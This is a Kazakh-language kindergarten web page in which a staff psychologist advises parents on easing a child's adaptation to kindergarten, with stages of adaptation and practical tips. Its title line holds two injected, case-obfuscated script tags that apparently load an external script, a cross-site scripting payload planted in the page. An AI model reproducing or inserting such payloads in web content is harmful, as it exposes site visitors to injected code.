БАЛАНЫ БАЛАБАҚАШАҒА БЕЙІМДЕУ БОЙЫНША КЕҢЕСТЕР. Балабақша педагог-психологы Орымбетова К.А.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.12.2021

БАЛАНЫ БАЛАБАҚАШАҒА БЕЙІМДЕУ БОЙЫНША КЕҢЕСТЕР
⠀
⠀⠀Баланың балабақшаға үйренуі үш деңгейде қарастырылады:☝
▶️ Жеңіл үйрену.
Бала жаңа ортаға бір айдың шамасында бейімделеді. Мұнда бөбектің тамаққа тәбеті бір аптаның ішінде, ұйқысы 1-2 аптаның ішінде үйдегі үйреншікті қалпына түседі. Аяқ астынаа ауруға ұшырамайды.
▶️ Жеңілдеу үйрену.
Баланың ұйқысы мен тамағы 20-40 күн шамасында бұрынғы қалпына келеді. Ай бойы қит етсе, көңіл – күйі бұзылып, жылай береді.
▶️ Ауыр үйрену.
Күні бойы жылап сықтаудан көз ашпайды. Тәрбиеші үнемі көтеріп, не жетектеп жүруді талап етеді. Жүйексіне жүк түскен сәби ауруға шалдығады. Психикасы бұзылып, ой – өрісінің дамуы тежелуі мүмкін.
⠀
⠀⠀Ондай жағдай болмау үшін ата – ана төмендегі жағдайларды ескеру керек:

📝  Алғашқы күні балаңызды балалардың серуені кезінде алып келіңіз. Бұл орын үйіңіздің алдындағы аулаға ұқсайдындықтан, бала көп жатсына қоймайды, балалармен, тәрбиешімен танысуға ыңғайлы.
📝 Егер бала бейтаныс адамдарға жақындамаса, күштеп, зорлап әрекет жасаудан аулық болыңыз. Бала бейтаныс адамдарға біртіндеп үйренеді.
📝  Баланың балабақшада болған күнін көбейте отырып, үйдегі жағдайды балабақшадағы күн тәртібіне ұқсас ұйымдастырыңыз, балаңызды өз бетімен киінуге, шешінуге, тамақтануға, беті- қолын жууға т.б. үйретіңіз.
📝  Кешке жақын балаңызды балабақшадан алып қайтарда ата – аталар балалрына қалай келетінін, қандай көңіл – күймен қарсы алатынын, балалар бір – бірімен қалай қоштасытынын бақылаңыз. Бұл балаңыздың балабақшаға еркін келуіне жол ашады.
📝 Балабақшадан қайтарда балаңыздан кіммен достақаны, қандай ойыншықпен ойнағаны туралы сұрап біліңіз. Жақсы істеріне үнемі қолдау көрсетіп отырыңыз.
📝  Алғашқы аптада балаңызды уақытында алып кетіп жүріңіз. Бала балабақшада жалғыз қалып қойса, қорғансыз, керексіз адам ретінде сезінеді, балада айналасындағы адамдарға деген сенімсіздік пайда болады.
📝  Үйде балаңызбен бірге балабақша туралы ойын ойнаңыз. Балабақшада ойыншықтар қайда тұратын, қандай ойыншықпен ойнағысы келетінін біліңіз, достарын табуға көмектесіңіз. Ойын арқылы балңыздың балабақшадағы қиындықтарын шеше аласыз.🌺

Просмотров: 356


Пікір қосу



Деректерді қолтаңбаға қосу